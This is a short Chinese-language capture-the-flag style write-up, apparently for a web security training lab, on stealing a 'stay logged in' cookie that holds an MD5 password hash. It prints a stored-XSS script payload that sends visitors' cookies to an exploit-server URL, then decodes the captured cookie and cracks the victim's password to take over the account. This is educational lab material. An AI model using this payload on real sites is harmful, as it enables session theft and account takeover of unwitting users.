# Authentication Lab10 這題網站把使用者密碼的 MD5 雜湊值存在 Cookie 裡,還能被 XSS 竊取,讓我們能離線破解密碼。 重點: - 透過 XSS 竊取 Carlos 的 stay-logged-in cookie。 - 從 cookie 裡拿到他的 MD5 密碼雜湊值。 - 用 MD5 破解網站上洩漏的 hash。 - 用密碼登入 Carlos → 刪除帳號成功解題。 一樣先進入網站登入帳密並勾 Stay logged in。 ![image](https://hackmd.io/_uploads/HyltxgwDxe.png) ![image](https://hackmd.io/_uploads/SycsgxDwgx.png) 同樣進入封包查看 Cookie 值。 ![image](https://hackmd.io/_uploads/ryMe-gDvxx.png) ``` wiener:51dc30ddc473d43a6011e9ebba6ca77 ``` 和之前一樣,規律是: ``` base64(username + ':' + md5(password)) ``` 這裡我們要想辦法利用 XSS 偷走 Carlos 的 cookie,所以用老方法,去留言。 ``` <script>document.location='https://exploit-0a7300bf04ff477cd0ceb4c301d100e2.exploit-server.net/exploit?cookie='+document.cookie</script> ``` ![image](https://hackmd.io/_uploads/SJAnbeDwxl.png) 這樣使用者在瀏覽這篇貼文的時候,就會夾帶自己的 Cookie 送到我手上了:D。 ![image](https://hackmd.io/_uploads/SJPcXgwPee.png) b64 endcode: ``` Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz ``` b64 decode: ``` carlos:26323c16d5f4dabff3bb136f2460a943 ``` Md5 Encrypt: ``` 26323c16d5f4dabff3bb136f2460a943 ``` Md5 Dncrypt: ``` onceuponatime ``` 最後帳密:`carlos:onceuponatime`。 ![image](https://hackmd.io/_uploads/SkZQVlvPlg.png) 刪除帳號就完成本題 Lab: ![image](https://hackmd.io/_uploads/S1iB4gDDel.png) ![image](https://hackmd.io/_uploads/SJ5UElDveg.png) ![image](https://hackmd.io/_uploads/SyBD4gvPlg.png) ---